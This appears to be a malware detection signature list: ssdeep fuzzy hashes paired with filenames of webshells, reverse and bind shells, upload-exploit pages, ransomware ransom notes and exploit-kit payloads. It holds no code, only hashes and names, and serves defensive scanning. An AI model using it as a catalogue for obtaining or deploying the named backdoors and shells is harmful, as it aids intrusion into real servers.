+6:WOTFVVMT9rWW17JnLd98gGTdWDj0SDsFWwjAYNx7dqIwdgXHv6P/IeHNetYV:WGzW155KdWDj0mkWwEYNx7JAgSPdGu,"testevull.txt.002"
+6:WOTFVVMT9rWW17grFPdWDj0SDsFWwjAYNx7dqIwdgXHv6P/IeHNetYV:WGzW1kPdWDj0mkWwEYNx7JAgSPdGu,"mailer-fbnet0.php"
+6:WOTFVVMT9rWW17grFPBYDdWDj0SDsFWwjAYNx7dqIwdgXHv6P/IeHNetYV:WGzW1kPuDdWDj0mkWwEYNx7JAgSPdGu,"evul.txt"
+6:WOTFVVMT9rWW17gMKHOdWDj0SDsFWwjAYNx7dqIwdgXHv6P/IeHNetYV:WGzW1fKHOdWDj0mkWwEYNx7JAgSPdGu,"mailer-fbnet3.php"
+6:WGeKsbh/W7BZjLGvwsA7W2AVJYQUG+7549bWVW4jNuIEwlv:WtKaWXLG4h7sYmr9yVW4jNuIflv,"weevely-1.1-cookie-password-2-dec.php"
+6:WALPBmfqFmkHhE+Pb6cisl8Q7GWLEdMw6n:WALpmfqFmkByC85SEdMzn,"Test.php.php.txt"
+6:W6tajszu4vvFS+ei4MeMzi4Mb/Mzi4MbWzi4MUi4Mv1i4MbrRqMYi4Mb4+uYi4Ma:Wef6ivFnSMOMf4OKIX2LRUi2,"php_niu_2.php"
+6:W6l6SZ6SZoLEC6XI/3keb6TJ13mJ6gFmxUbwWCHn:W//VOI8aYz3KFm6Yn,"php_niu_1.php"
+6:W6COvGCbllNNE6lue095LB6Qv7D36qAMeIM10yusuuELB6Qe4tzbWCKTab:WhsFTEMU168f6qAJIa0yushE16Ctu9c,"webshell-cnseay02-1.php"
+6:VZ3H8EPzZiINPMIOLvZQ3/jQ7Md4qEKDGsDBH9BFEPM7bCzR0RB5ncaIOFOR:VXkyQ7Md4qLt9B7a0RBy5R,"default.conf"
+6:UsqUKpSxcHHBXCEc9HSE1Fgpzj9yHGv55bPN8rgHFMHDIwdgaDAYNx7w+lYoxEb6:UZTvHHBXC1l4pzj9ymvPjirwFMHUAgad,"780bd1a1d1f6eb88bc1db1fefc6fe3e0_php.txt"
+6:UsqUKpSxcHHBXCEc9HSE1Fgpzj9RPN8rKzFMHDIwdgaDAYNx7w+lYoxEbEQpehXn:UZTvHHBXC1l4pzj9lirKzFMHUAgakYN1,"f8f95c2e70d235b874bf2a8685db777d_php.txt"
+6:UsqUKpSxcHHBXCEc9HSE1Fgpzj9e7sbPN8il62GThFMHDIwdgaDAYNx7w+lYoxEu:UZTvHHBXC1l4pzj9ljiGFKhFMHUAgak2,"ffbbb5d32163d16a1292145bd2a91a5b_php.txt"
+6:UsqUKpsWNu4EevBfSOJTW8+NBuGI73xBANwVfk7nWP87xUG49ni8uFFaKi1gQ:UZTGqu4EevBXiPup7bVfk75mfn7uyKBQ,"f676b2ad8c9cbf29b897ab784688117d_php.txt"
+6:UsqUKpsKJzi9LTF6KUi9hx9KFW9sMFFHAlWHqx946Qfu/xIx5XHBMvKb:UZTGMuxTBT9AEbnH2WKb46QfBNFb,"a97620643265aac147e61af7d2a07e3d_php.txt"
+6:UsqUKpSIi9Li9caai96xcc9Qa2lRAqx946D4WIxfaXMvKb:UZTAxiUicGcOa8RVb46UyTb,"1992fc7d8c9059cb8549ac4e8d439420_php.txt.001.001.001.001"
+6:UsqUKpSegzicTF62myWF4n9WpxDiszAMasUskK3Y:UZT5cTtmyWqn9Wn/pas+KI,"c4a63d450b58cff2715624c6bea92951_php.txt"
+6:UsqUKpSbzIoi7GBwew78m+t5W2A6xKgX8mzIP5W2AI+R:UZTai7YwelXD/hMbcR,"99cfc5cce8fa9772ab8c74aae425b032_php.txt"
+6:UsqUKpSaiVii6haf40jy6WNjPjNGW+7S0ldTx2ecRGEAH1R:UZTo6hafXy6SenTbcRG7VR,"937dae9329c7533ef03a908b192181b5_php.txt"
+6:UsqUKprHHDv4Q4/t/OX1J0A4Q4/t/OX1cQ24Q4/t/OX12SO4vCn:UZTBDv4vhK6A4vhK+4vhK2DiCn,"082575ea4c63a7db748e0445df3a7097_php.txt"
+6:UsqUKprHH3HQxBBILL7EAqdDCEI3EER92xP49NErArognuFNuJsyDN6O4vCn:UZTBgxTIXAAqNIUc2B4/EeDKNuJsydiC,"50d386d8e06bc429ac6c7af5b174ffdb_php.txt"
+6:UsqUKprHH3ecogYEAqdDCEI3EER92xP49NErArognuFNuJsyDN6O4vCn:UZTBu+pAqNIUc2B4/EeDKNuJsydiCn,"0f12f6664f0efeb6a8d35f40ec28abd2_php.txt"
+6:UsqUKprHH30EZEAqdDCEI3EER92xP49NErArognuFNuJsyDN6O4vCn:UZTBJ6AqNIUc2B4/EeDKNuJsydiCn,"dcf9b7abf4e5f066a4b52ae62470e4c8_php.txt"
+6:UsqUKpfEojk6DIQQQvk66k42gyIX1dFFaj9vdXF4hj:UZT1njk6Dxvk66u6X1dFMjNdV45,"7ca857d86ead293d7a61e84b28add6d4_php.txt"
+6:UsqUKpbcVwZXUG+yoPiXRjyYmSWWXzslgN4E/HjPtCa7ZhlNG2lN6O4vCn:UZTx2eXU3PIjnmSTXzsQ4ECa7ZRPriCn,"211e15d59994421cde185792a0b4d6e2_php.txt"
+6:UsqUKp2rV0Aq7qhAqFzL++AiW2A6x+AiPev:UZTY0Aq4K+Ai/+A8w,"2015-09-08-CryptoWall-3.0-decrypt-instructions.txt"
+6:UsqUKp2rV0Aq7qhAE+jygtQEi1WpjXEMREEBvlNiifaRtdVMrW2AjoAYORev:UZTY0AqzjygaEfpYMREwR+t0Sk+w,"bb3b5c26e484f292e231329b9378c127_php.txt"
+6:UsqUKp2rV0Aq7qhAE+jygtQEi1WpjXEMREEBvlNiifaERRQcosW2AjoAYORev:UZTY0AqzjygaEfpYMREwRFR2xsSk+w,"4d67e09f0b17fd06b56769dfeba4c7c6_php.txt"
+6:uDiURe1LhpQbLH+uoJ+R0hFMIWW2Mnhszc8BKlKN:uDhRqLfUUphFfThszfN,"jjw.jspx"
+6:uDiURe1LhcXQ54GAz7API22MnIZEWGo5R2Mnrs5a+8TIKN:uDhRqLn41IPtTIZEWGoHTA5aDN,"w.jspx"
+6:TQT5Pccwi23fofvDTpjIny1R3K4CZAzD5CSdEJ7ppkZyHjpxgqhLV:TawZAfvDljIngkhZicn7p9rhLV,"edoyjk0d.h1e.vbs"
+6:+TbERPccwi23fofvDTpjIny1R3K4CZAzD5CSdEJ7N1tkZyHjz6FYmANqhZpb:QElwZAfvDljIngkhZicn7Nn+MohZV,"0vwy5x5w.sxp.vbs"
+6:/T5Pccwi23fofvDTpjIny1R3K4CZAzD5CSdEJ7LRxZyHjLgqhQV:/TtwZAfvDljIngkhZicn714nhQV,"jve5betr.n45.vbs"
+6:SM3DFVVjAv3TzgrdBEWA3xeDtobP4qXKRgGTOWDj+7mDsFWwjAYNx7dqIwdgX8u5:SMRjuGB/AID2P4qaiKOWDj+ukWwEYNx/,"t2.php"
+6:SdG8DuOBCxkZ+NsQEqrye9w/eJ1OOCTrQTswTrMRS8/qnb8rZqbv:SdJuFxkANnEqrywwcOOCisw2qbLL,"fsockopen.tpl"
+6:SAIgW2AcZ5mcbII+ovxK/iiBIVqOwdooZPdtgK6gWELAIyWXKhXvQv:SA7ZZIcsIdwfOuZPdx6gLqNxYv,"weevely-1.1-ref-qazwsxedc-1-obf.php"
+6:S7e59gRWOZQIVULIr3Be3LJYVp7BKh4JpCFy3FZcT:SqoRWLCQYVBEKJsFNT,"某变异pHp一句话木马.php"
+6:S3cSFtEXVIoTs1W8jAiAGy27xmFMxPMxKyKT6iYiH3:Qc2tqIoTs48tA10XPMxKjT6qH3,"__init__.py"
+6:S1g3Tu1sycbvSBGcqUdkfggYCTUV0A7VEER9czMzets:Sq3u4bk8MlgBnAScZzN,"Uploader.txt"
+6:S1g3Tu1sycbvSBGcqUdkfggYCTUV0A7VEER9czMzetC:Sq3u4bk8MlgBnAScZz9,"uploader.txt"
+6:RT5Pccwi23fofvDTpjIny1R3K4CZAzD5CSdEJ70Z2xZyHjzfqh9:3wZAfvDljIngkhZicn70ZrCh9,"v33fkxhy.2m3.vbs"
+6:+RRPccwi23fofvDTpjIny1R3K4CZAzD5CSdEJ7NzZyHjz8qhVxn:EwZAfvDljIngkhZicn7w7hVxn,"ctb4jdr2.dh1.vbs"
+6:RlS3X5MdrWnijBRKWS9+GGJ7vC03PwBC4LLhYr6wfVArlNHGIh/ENVpO9:RlKudynqCx4a0fw04fhq6COrXppENVpk,"test.sct"
+6:qzxO961BYkAnAqJmUySoZx/fnAqJmW/CUX45S7yKSNKWNCkLusVS:kxP93qJmUyp/4qJmWJXWSP+KiusVS,"mikolaj3.txt"
+6:QUie7EINKw2Uocs27TLRt7lZ1y41PD74hiDiURa0:QUikY7URsuf7lZ7uiD3B,"readme.MD"
+6:Q/o9WCWP2Mnp+e0ICBAeiW2Mnhsj4z1NMRAlFrlFRJNtx+Rw2kAiI:Qo0TPTph0IdaThsjq1NMRC9Ew2kS,"cmd2.jsp"
+6:qFzLMN1MaqmEdADmc7bwGdDeZaY9sVP3SdA4i4eaLNN9meF1AK+4Qv:uG4ADm0eZaIsh3S64i45NX3vFQv,"simple_cmd.txt"
+6:qFzLMN1MaqmEdADmc7bwGdDeZaY9sVP3SdA4i4eaLNN9meF1AK+4Q3:uG4ADm0eZaIsh3S64i45NX3vFQ3,"simple_cmd.txt.001"
+6:Q3AXvEKcFzFEVCJWqQFMRfR8eAJYdeR8Ko3A:Q3A/iFzFEVCJrQFMBDw,"扫描端口_php.ccc"
+6:POV4EkIuhjEm7bdxXQedwPodxIVpZVU7H3n:LjjEmHngedwwno5U7X,"s.php"
+6:pn0+DyDBqWObkiTaOF2ePzRx3eOAqf/gJuKCezoz3oA:J0+xkkF2ePzRxOq3gJQezY,"ZyklonShell.php"
+6:Otzr3maAqLvXc9O/V9ujbbTqC5RC+Aq0abn:OtzzmaAqLvXsCyjbbTqC5oSb,"res7.php"
+6:Ot0QMJcmv/doMMoTBhDWsKqFsTAQiqTA1SsTR3uLMM:OeQMJbvlV9osKqFsTAQCYyELMM,"8643b39116d592e569e531e528934ebe.php"
+6:OrMTg9Eo1xG+kSY4f1YMTlomF6EUnfoZBeA5xABeI/FNhC9XAvf3TYrOkV3:OrAgiUGuNTloi6pTh18f3,"w.php"
+6:OPWli23fofvDTpjIny1R3K4CZAzD5CSdEJ7FJoPHjBzFMNqhvbn:flZAfvDljIngkhZicn7FJov5FThz,"vt2itszs.jm3.vbs~"
+6:OPccwi23fofvDTpjIny1R3K4CZAzD5CSdEJ7cKkZyHj3shQNqhD8V:IwZAfvDljIngkhZicn7cKrIhPhYV,"jvqvnoqi.2sm.vbs"
+6:OmZLYabN61OmphVY4WO8xbVeHLNOGpeUN3/WLNR1cskjWdMV/Mt+v:O+YaZ4V3Vq/bVerNbpJ3/WLNR1c1fMtu,"sqzr.php"
+6:O8NlcDXNqNXGzLC+r41ZdXeDLkVL+1SDrHG/xIx5UyrpBIev:O8Nlo4NXcL7OmLkVZL5qyrvIw,"lskdjflksjdflkjsdlkjf2.txt"
+6:O52xG1c4Xa1OVtdvwwtZAT9dmgPtZAT9fXvW5mkiSdEJ7z5gYGQtZATdhXUL:O52xG1xa1OVvw5rgJ+Zin7z5dMxC,"webshell.php"
+6:+NWI5Pccwi23fofvDTpjIny1R3K4CZAzD5CSdEJ7HcQIXZyHjVUNqhl:AWItwZAfvDljIngkhZicn78ehbhl,"24ec2c3h.m0r.vbs"
+6:nR2dOzR2uDf/qw5R27cdpWfAJHUz/ZB6FrE4:nR2dOzR2uDfCw5R2YdiOU/r6H,"ASP一句话02.txt"
+6:nJe+dWNNBKouK/kSWxRefWPAiFnQijRS+gs37GJ:ng+dKNBKtKsS6QWPVFnQi7gk7GJ,"DAws.md"
+6:MPYBrJ23fofvDTpjIny1R3K4CZAzD5CSdEJ7uPHj9gqhfLqs:XBAAfvDljIngkhZicn7OZfhfLqs,"ij2yuclu.itw.vbs"
+6:M+M+cF7LoLWkuLuNW2ovKtQWO5xtFYhgTeIjBg9Luc2qBabrXbqL:M+507kEu9sSedjBuLuc2Nm,"simple-commander-2.php"
+6:M+M+cF7LoLWkuLk9ovKtQWO5xtFYhgTeIjBg9LGF1LoRO+xA4DbqL:M+507kEk9sSedjBuLGFBt+xA4q,"simple-request-cmd-obf.php"
+6:mf5Pccwi23fofvDTpjIny1R3K4CZAzD5CSdEJ7HZyHj32PqhbQWn:KwZAfvDljIngkhZicn7eqChEW,"301ghajh.5rb.vbs"
+6:LXcWkRoYy5+CBTBh9bEMInccv3RxAqhYljMlyKQuQWmTHV:LXcWyYEgvAPHAqhYmlyK7mT1,"httpModules.md"
+6:LoI5Pccwi23fofvDTpjIny1R3K4CZAzD5CSdEJ7FZyHj9LPqhdUQDr:kItwZAfvDljIngkhZicn7cZ+hdRr,"dps4f3n3.nzt.vbs"
+6:LG50P9ieQ2VX70BUtLy7Fc3AHMcn9Wjtd:L+C9i6VYBUtLuc3qMcn9Std,"tmp"
+6:kWKE6FGHf59XaMcPSMB/OuBB3NRO0V3NjYT2B/TBB3NC/MrL:MEBfbKFaQdny0BqTOTcEX,"biantai.php"
+6:KqYMoxA2MnIbCQzn4GAz7APGA2MnIUR2XijkFidHWlwEHJL+:Keo2TIbCQL41IPGATIIe/WHWlPHJL+,"新型JSP小马支持上传任意格式文件.jsp"
+6:KIPR0D4BCqnUj+j4KXD0E/WqyLACknamduMvYQVJUeGdXGVAUPKI:KIPJnRj4w8HqaHi5UBGVpF,"ewebedtior编辑器本地构造上传漏洞利用代码.html"
+6:kImPm/AqkBvQFCXQi9DCte+woeiwWRxbiMKv9DQ2dv:3me/AqkBvucFke+xw3Mwld,"elelele.php"
+6:KIf3D+SDk6wc4z5C3DDOnUjfKtO8TGdqEbcGm9rklWQoMTpAq+L0Z:KIDkFmmUjKtO8XEwSWyplFZ,"FCKeditor编辑器本地构造的上传.html"
+6:KIf3D+SDk6wc4utA6znnA3O8TGdqEbcGm9rklWQoMTpAq+L0Z:KIDkmtNWO8XEwSWyplFZ,"构造的上传.html"
+6:KI8KbA8VGbIFFCJHbTMdhOY6dqWQoMT0rqWdIWZdqDwAql70NIXSDNqEfovsO5lq:KITUbCw3MdhOoWyBWdIDwlGaSDQEKvlq,"md5.php"
+6:kBN4KUJZ/zDnXUCFYpxN6zIsFiSscq6dD1QEoMPB0FC+w4vrIPe58bCD:kBylZ/zrXiQCIdGEoMPMyPpM,"mysql.tpl"
+6:kB2XUCFYJxN6zIsFiSssq6dD1QEoNnH37HZ1XiUwF4vrIPe58boeZ:kB2XyQCYdGEoVHrZdiUw5PpEeZ,"pgsql.tpl"
+6:k4xAuBcDJYL3zfaMQenmmfvh0c/JImG8r9piv8:cOcVYzzHQuvembrXik,"w01.php"
+6:JzAeOLOKYrDkPj+XYnYwph02nrqshPqHHrqsh4ehCMHr:ip0NYRL2g0CMr,"reverse-perl.pl"
+6:jNgo1aL82Tv2TvRZI0DoYpOwTQ/HncbxTUVkMO5/q0W3oz:Co1awbTnI0DoYY/n4vpPV,"cmd.php"
+6:JjwOoDCxvk1HR2+QFNTkk1H1HZzVFNJCLoxRJXsntbaWzJmv:JsOoWxvkhRbQgkv55ZCoRqbaWzJmv,"simple-backdoor.txt"
+6:jGmyXH+5AMRNT15eAoNGyhQNRFm+ya5+5FdllZ+sMKLbL5A0RQbTVeGgLxLELpcN:jGXXHJYx5foNHhQNRE+yD5JlZ+4flAox,"stdafx.cpp"
+6:jGmyXH+5AMRNT15eAoNGy8Fm+ya5+5FdllZ+sMKLbL5A0RQbTVeGgLxLELpcxLgi:jGXXHJYx5foNH8E+yD5JlZ+4flAoQ/Vy,"stdafx.cpp"
+6:jGmyXH+5AMRNT15eAoneQFm+ya5+5FdllZ+sMKLbL5A0RQbTVeGgLxLELpcxLgl8:jGXXHJYx5foZE+yD5JlZ+4flAoQ/V6mQ,"stdafx.cpp"
+6:jGmyXH+5AMRNT15eAofWYRFm+ya5+5FdllZ+sMKLbL5A0RQbTVeGgLxLELpcxLgi:jGXXHJYx5fofW8E+yD5JlZ+4flAoQ/Vy,"stdafx.cpp"
+6:jGmyXH+5AMRNT15eAofcQFm+ya5+5FdllZ+sMKLbL5A0RQbTVeGgLxLELpcxLgl8:jGXXHJYx5fofXE+yD5JlZ+4flAoQ/V6n,"stdafx.cpp"
+6:jGmyXH+5AMRNT15eAocy8K8Fm+ya5+5FdllZ+sMKLbL5A0RQbTVeGgLxLELpcxLH:jGXXHJYx5fon8K8E+yD5JlZ+4flAoQ/I,"stdafx.cpp"
+6:jGmyXH+5AMRNT15eAoChQX8LsX/Fm+ya5+5FdllZ+sMKLbL5A0RQbTVeGgLxLELQ:jGXXHJYx5foCVLsPE+yD5JlZ+4flAoQw,"stdafx.cpp"
+6:jGmyXH+5AMRNT15eAoB8Fm+ya5+5FdllZ+sMKLbL5A0RQbTVeGgLxLELpcxLglR6:jGXXHJYx5foB8E+yD5JlZ+4flAoQ/V6n,"stdafx.cpp"
+6:jGmyXH+5AMRNT15eAo9RFm+ya5+5FdllZ+sMKLbL5A0RQbTVeGgLxLELpcxLglR6:jGXXHJYx5fo9RE+yD5JlZ+4flAoQ/V6n,"stdafx.cpp"
+6:jGmb/eAS3FingUASX5mqVpUASbN03BVJ1+/TlAo9MsIAqVA0OAVAqcIA1eGgcMRV:jG0/fS4gZSJBpSy3C/ZAo9+AqVAxAVA0,"stdafx.h"
+6:jGmb/eAS3FingUASX5mqVpUASbN03BVJ1+/TlAo9MsIAqVA0mVeGgcMRLLELpcjB:jG0/fS4gZSJBpSy3C/ZAo9+AqVALV6co,"stdafx.h"
+6:JGLOpk4PYrDkvCdKWKqnmSUXvFAL3Ah0mjr1eshP6jr1esh4CBr1cMHK:UQk/NKqm9X9AL3+le7eqzcMK,"bind-perl.pl"
+6:jGbUvuKwLR3pV6Ga24RwsCzfajfKaZWOfacOfKZrw:jGbUKLFb6l24azCjRMOCcOgrw,"ex222.php"
+6:jDSgGERLNqMWMyDVoHUpRfDRGXL4iFsFwWoH1dEh8IXJAesHqWFXSzsTn:/STALgMWM+VaUpRfDRGhFsFba88IXyn7,"2016-08-10-Cerber-decryption-instructions.vbs"
+6:jDSgGE1sWaqMWMyDVoHUpRfDRGXL4iFsFwWoH1dEh8IXJAesHqWFXSzsTn:/STcrMWM+VaUpRfDRGhFsFba88IXyntJ,"2016-08-05-Cerber-decrypt-instructions.vbs"
+6:jDSggCGVoHh/ziFsFwWoHwEh85kowKBfO2m6Tn:/SZCGVah/WFsFbaf8NwKZOn6Tn,"2016-06-26-Cerber-decryption-instructions.vbs"
+6:jD8K4WDKwfEzA0RQbeK5AqOWuNEa35RhCaltzgafQp:jD8K4Wm3AoQtAq5uWacat4,"ExeToInjectInTo.cpp"
+6:j0s4PD8Hf0HsWzf1w9YX4PdOOXgvct+2s5J09l5WgyMwprGUQ/WAQJXF2:j0TDMMHzw6I9QvO+15Jyl5Wfbpap/WAp,"download 下载文件.asp"
+6:iRWpeXi8pXj+YaNteMKNdOFnOLu1ynrEiLAuoLFbWXb+eC:zeXi8pT+xzGNdqI0uoLMb+x,"Get-User.ps1"
+6:iqsYQWOagTQ5/doaiaji9MjNBjzdazK1uKlbH06UCyKLkDv:sY/k05/8a3Bjg8r0p6Lgv,"simple-webshell-post-cmd.php"
+6:IJ+SDG/tdqWQoMTpAqvL+wdgtV4KFZ349dIdD49WZD4WFV49on:AUiWyplD+Ag4KF51NNjVRn,"uploader.php"
+6:ieTlUMefOe5LxvLyNmF0EFuzcrQWfYYDVlsRINFG8k+18esHGh:i+UjLxv+8BLrfLjsRgFGXXdHGh,"89.php"
+6:HoR922Nwdg+7QIwdgckHgQIwdgiK0weKi6czPxb2rwJKO920m6:HoR9RNAg+7dAgckAdAgiFweKlcjxtUg3,"seo-spam3.php"
+6:hjwOoDCxvk1HR2+QFNTkk1H1HZzVFNJCLoxRJXsntbaWzJm3:hsOoWxvkhRbQgkv55ZCoRqbaWzJm3,"Simple_PHP_backdoor_by_DK.txt"
+6:HFsPof6GYiz2q1FnTBFHhNgRLI8iu9OrXnCEO2Laq1FnTEJSQnNdGK1H4BijGFnj:HFsPof6GxPTfgtI7tLnCR2LaqPTGSQnk,"2015-09-12.md"
+6:h9SAw8a0zGRJ217RjpdxcLEHKckjxOic6RLO0qCRj9:vSAwYzGRJ2Ra50aRdqCR5,"DAws.bat"
+6:h5Pccwi23fofvDTpjIny1R3K4CZAzD5CSdEJ7JVZyHj1eYdqhd:htwZAfvDljIngkhZicn7JMNYhd,"hirsngu3.dv1.vbs"
+6:gUjT28dTFzONNvW5gEkBxzNjTjodBH0MWuC+ujlUk5dv52H1nxHOgvjodBWd5D:TT2WFiPOWzRTWUdlj5Jmhxu0WW7D,"cmd-special-char.php"
+6:GrQWR0iYBtKNhdOrpw/NF4V6IbCl9YVqMAHiUJRp5cQGIRmpE/an:GrY1tKtO1SF4V6Kw9YUJHZJRpqQnmian,"proxy.cfm"
+6:glPFcDQHDg6SaHDQK0c5GDUgXRsKSu5/K1Q6RRV+ICmv:wcag6bHOcVgh85xRRV+/mv,"bad22.php"
+6:gfsGW7NXGzLcCqyNScpPmzLcOCG8mzesV8y7fSUFQI39:yUNXcLd/uLsMesVnzSUGK,"malshell22-3.txt"
+6:fTQ7lpF0IFLYUhH8erdAYRAzrSeauVKKHG0+XzapV6FVCesv:87lpFxiUhH8+An4ud8zGuvO,"ReadMe.txt"
+6:fsTkBGOtbPYryGrjpj09R8sUNcL0H0OcucEQVYuaktBs:UYGOVPlG5a8sVS0MQ+uaus,"imageshell.pht"
+6:fcing7ESjGN95d5VF6/Scejf58TaakFcjcqn:0LEdd5VFESjf5eaakmjcqn,"udp_backconnect.sh"
+6:Eq9ADvvOAi2jKlWtt8DUpzfLX3OwfNSxegN53wgJz0HEQv:tavvOA/KlDD2b3fSea53Fz0k6,"lost.php.shell.creator2.php"
+6:en8KDw9jbeA9Nv62CWT5ahPN9RIzcGCvvUF2kVfVJYVlw+8QmWpIxuj6Jkn:W8K0/zZ2WIh1LOfOElYVaFbxBJkn,"w02.php"
+6:EMvpRKK+P/hPwTbQSP/SERK/WoA0IAm8wv:nvpRKK+cbv3dRK/zA0IAbwv,"xiaom.php"
+6:DkWhq/mAks4jyXfwQZVrJzR/B7ADvcVAZq4kcYZM6PN:d4vks4jyXfwi9pErkAZ85N,"不带引号的Asp一句话.asp"
+6:dFVVMT9rWWFXumfP1WDj4WOSDsFWwjAYNx7dqIwdgXHv6A/X0tYLUH0tYQ:fzWFXN1WDjPOmkWwEYNx7JAgSoXWwT,"opa.txt"
+6:cZNjp0tS9OX/HJRd+ApOOMGX/Q1NpHpxrrHVn4TMv:c/p0tX/HJikMGvQ1VxnFB,"Readme.md"
+6:Cyh/IEk/w6z9wEW2AVJYQUshYEAHSWVWxu:C21k46zvsYMhkVWY,"legacycookie_php.tpl"
+6:CHAGY33M5ucJxWQUlJKGmHGkMBc8HGxAGQGyMGB1bW3OcnODw:CgV3cw4onlo82hAMGBgOG0w,"calc.ps1"
+6:BzaAoaBdjKkS0gi8BdjKkS0glsK1FzbGoNqd/23flQjzKOB3n:BzaDaBJKkpgi8BJKkpglsK1FzFEOrOxn,"2016-04-26-pseudo-Darkleech-Angler-EK-artifacts-from-infected-host.txt"
+6:BqwCD2utTyEC05NORpRIIIILGLSZocIQhXORpRIIIILztN:BWDPpwpRIIIILGLVcIQhupRIIIILT,"ExitThread.asm"
+6:Bqw62utTyWT052ARpRL/rLSZb953H3pqMBYARpRLz+:B2P98pRL/rLO953H3pTBDpRLq,"ExitThread.asm"
+6:Bqw62ut+F4ur3v9pttEfdpkRpRK1aJvW+af2JBWRGMmQ0NBv3cRyRpRLWN7Qbg9n:B2mDv9psFqpReChaf2nWsQevcYpRnbg9,"CallDllMain.asm"
+6:Bqw62ut+F4HHsqRT/cEfd8yRpRIIII4M1y+af2JBOJm2VRpRIIIIiWN7QbgjufKr:B2PH9RT/vFXpRIIIIPlaf2nOA27pRIIp,"CallDllMain.asm"
+6:BQg4VOzXXVB/u/Ias+xlGWTTKfZha5qSrNRiJf93Zg/v8LQIMIHCOxT8IC:Bx4YzHX/us+3PUWqSrHG93ZQv2Q7IicC,"Silic Group_readme.txt"
+6:BNMJAOI4ujF2XiJFMbUv79nXoMs+/t/JEEYu/INwBvU/mjKgO5SC1x+:YP0uiJFMb+xXoxKSZu/INw1UejtYSj,"bypass_safedog_03.asp"
+6:Ao5xCSfmnudiWfLmWfNWf67ZziFYJCblAMf6Fa4GNDSfb3fmaLAFV8MKXZAx6KGj:AWzenudjLa67gPlAMf6GNOLmWQk,"2016-05-26-Afraidgate-Angler-EK-CryptXXX-decrypt-instructions.txt"
+6:aEtYtyxrU4HDxK0RKw/uHAFWYWA0IAmCaSli2FEDkTQLUWLi2FED0:1YYTVK0Rp9FqA0IAkvKEDYQ4KED0,"bypass_safedog_02.asp"
+6:aEm7z5e/YeDfwVZsJymGq6gEN2b5e/vE4GWbiWGrF6vwFfjSpliAOSvP31:u7z5e/YcwfAE05e/jjOWYF2wFWWH+t,"ASPX一句话02.txt"
+6:aEkFAykPPqyWAvVWPAcjACbynBCfnyLrVQTSEY11bPZNVL:86ykTNVWPZnyBuyBmSzrVNVL,"上传马.aspx"
+6:A6GJzJsVJYVk+CYrabGiiJm2cCa+tMAXfNEIl6Aa:A6GSYVk8raJiJB24PWIlra,"f694b2486701e8c79aa8a8d1daf49231.php"
+6:9IEyX/uiwXIdfJoNRgp4gsS30WMZn/DQQW/dX28XX4KBNoi/VfiaXe+52:9IEy21YdfJoNRzgB30Z/DZKp49i/dPet,"php-extension-backdoor.md"
+6:7VU0YrMPDXyOHY5vkKHYJJEnKBYyvCB+LgyKBM5Y/xrZ6KCHKF2xKtyLIwQx:7VpqADX5HWvFYJJEKO8i+Lgyac8EKIK9,"aspx变形一句话.aspx"
+6:7L/pZyqYUwKotJr8YBCLv/9ELYHFqk3aQY6+4JEyO70Hk8/un5lWjqp4cAVRitl4:3CFUb1v/OclqkKvKO70yn7yr5Vwtq,"2016-04-21-iframe-returned-from-tobiasdesigns.com-pointing-to-Rig-EK.txt"
+6:7ew8a0LNDStwVxcEvP+uPC8RojxitFtd3HjFTtct1:ywYLNDStw/PDoAtZqP,"DAws.sh"
+6:6/o9WCWP2Mnp+eFWICBAeiW2MnhsjIFZn0RAlFr9HJNtx2RwLF6L:6g0TPTphFWIdaThsjI7n0RSp9swLF6L,"带回显执行cmd.jsp"
+6:6EWqYMw2fay8LR2MnrIv/yBFGWvIthsYhwFNUeNnyVGMsNR4x54zkMX83AYAob4O:eew2falRT4s8hwNB8sNR4aRX8tNW8TR,"another-jsp-shell-simple.jsp"
+6:6cSNGf5Pccwi23fofvDTpjIny1R3K4CZAzD5CSdEJ7qXZyHjo7wqhpJV:iAwZAfvDljIngkhZicn7qOaPhTV,"jorgxg12.xni.vbs"
+6:5YvaR0Sng2LNtxS7duOh7WMdUWRwahQ4UmaRnvLLaVdrMxN1CLfRhaNY0TThaNg5:5Yyaqgy1GdBNLHRwGQTjhTLSdQvBZIa5,"convert.js"
+6:5RNPLNNNr3eEoPm8CDrOmL6bfG3MyqKJncMBK+4GqMbfvOKlrMz/FEJlEcPHt:5rTfN6EoqO8i6AKZcMmbweEw+TEcl,"info.js"
+6:5jpllEC0GDBcYsTUtZ21W/b3Uh17nxylHllwoaC0G1uWl+lBlX:5jpluGlcXTujUNyplyNG1uiaTX,"20160201-142411-Vq7d62juZ1YAAFHBc@UAAAAC-file-UDrdUT.1454300651_1"
+6:4QFVVjAv3TzgrdBEWAH18hoFWOWDjGDsFWwjAYNx7dqIwdgX80dAfwZQ6PdAfwl:PjuGB/A6OWDjSkWwEYNx7JAgZd7eed7l,"cmd.txt.001"
+6:4BLP93n23fofvDTpjIny1R3K4CZAzD5CSdEJ7zaI1RPHjzwmPqhXJch:4Bp2AfvDljIngkhZicn71tCheh,"gybxhaao.32w.vbs"
+6:3iERPHnoMn23fofvDTpjIny1R3K4CZAzD5CSdEJ7jAZ7Hj35NqhK0:3iEVnR2AfvDljIngkhZicn7KjjOh7,"burdg5bw.2su.vbs"
+6:2vW2At5Xjz3vZTUp3vbdVcrTqhq1acuKY+9Xjz3p/2X5IHGdyFHv6kPH:E+5XHZTW3vbfcrbkcuKX9XAXCG8Hv6y,"ss.php"
+6:2vW2AF2WiDhGoAH5i+zlkX9JKoupU/99AwcxSP8J5TP8mVT5Swue0NvU/99GD0Nl:EE2W5V7uKoue4wcIwhp0W+IW8JGXqsq1,"redirect5.php"
+6:2+/PJDb+YUGaKEFI0I/lugNlAIt+nN26sTcxeIiF+MLeQBMpdIAqw:l/Vb+RGacBlumaIQNx8DP6QAB,"targetver.h"
+6:2ordEJ7Zjj1s7dEJ7uQrSdEJ7XhPKSdEJ7jvKgRRNX/YuQSdEJ70RNX/KJ7hE/Xz:Ti7tx7uC7xPm7TKgV/O7m/Msj,"使用说明.txt"
+6144:ZkPDr5ykgnCyFbdmVwQK1IUObxgQx4OI8HKLG19:ZY5gnCMAOf8xggHXKC,"2016-06-21-EITest-Neutrino-EK-payload-CryptXXX.dll"
+6144:zFKXnAoAaOsvubggSH05asnngoINN1OAT:xKXnAqGEgSHtsngoI31OI,"2016-06-29-afraidgate-Neutrino-EK-payload-Locky-after-marketingguerrilla.es.exe"
+6144:ZekHcGZbNPd6pDJEslYHoowVjsmNsR3sXy/fPUe6M7KD9T3BxMn2Oq2Kz2222UH/:9Hc2F6UHrEsR3nfPUe6btTT,"2016-07-21-pseudoDarkleech-Neutrino-EK-payload-CryptXXX-after-opencv.org-first-and-second-run.dll"
